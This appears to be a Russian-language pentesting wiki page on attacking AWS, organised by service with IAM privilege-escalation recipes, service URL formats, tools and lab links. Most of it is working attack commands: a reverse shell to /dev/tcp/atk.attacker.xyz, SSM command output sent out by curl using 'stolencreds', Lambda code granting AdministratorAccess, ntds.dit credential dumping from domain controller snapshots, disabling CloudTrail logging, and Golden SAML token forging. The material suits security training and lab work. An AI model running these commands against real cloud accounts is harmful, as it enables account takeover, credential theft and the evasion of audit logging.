== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

[https://learntocloud.guide/#/phase5/README learntocloud(много ссылок)]

== Книги ==

